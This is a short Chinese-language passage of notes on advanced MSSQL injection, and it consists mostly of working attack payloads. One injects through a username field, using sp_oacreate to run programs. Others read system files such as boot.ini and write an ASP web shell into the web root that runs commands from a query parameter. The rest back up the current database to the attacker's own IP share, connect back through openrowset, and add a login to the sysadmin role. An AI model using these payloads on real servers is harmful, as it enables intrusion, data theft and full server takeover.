Mssql高级注入笔记II(2)
指定在用户名后面来执行它:
Username:'; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'notepad.exe'—
使用FSO读一个已知的文本文件:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
创建了一个能执行通过提交的命令,默认是asp那组权限的用户下运行,前提是sp_oacreate扩展存在
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>'
sp_who '1' select * from sysobjects
针对局域网渗透,备份拖库或者非sa用户
declare @a sysname;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat ,name=test;--
当前数据库就备份到你的硬盘上了
select * from openrowset(sqloledb,myserver;sa;,select * from table) 回连,默认需要支持多语句查询
添加登录,使其成为固定服务器角色的成员。
语法
sp_addsrvrolemember [ @loginame = ] 'login'
[@rolename =] 'role'
参数
[@loginame =] 'login'
是添加到固定服务器角色的登录名称。login 的数据类型为 sysname,没有默认值。login 可以是 Microsoft? SQL Server? 登录或 Microsoft Windows NT? 用户帐户。如果还没有对该 Windows NT 登录授予 SQL Server 访问权限,那么将自动对其授予访问权限。
[@rolename =] 'role'
要将登录添加到的固定服务器角色的名称。role 的数据类型为 sysname,默认值为 NULL,它必须是下列值之一:
sysadmin
securityadmin
serveradmin
setupadmin
processadmin
内容版权声明:除非注明,否则皆为本站原创文章。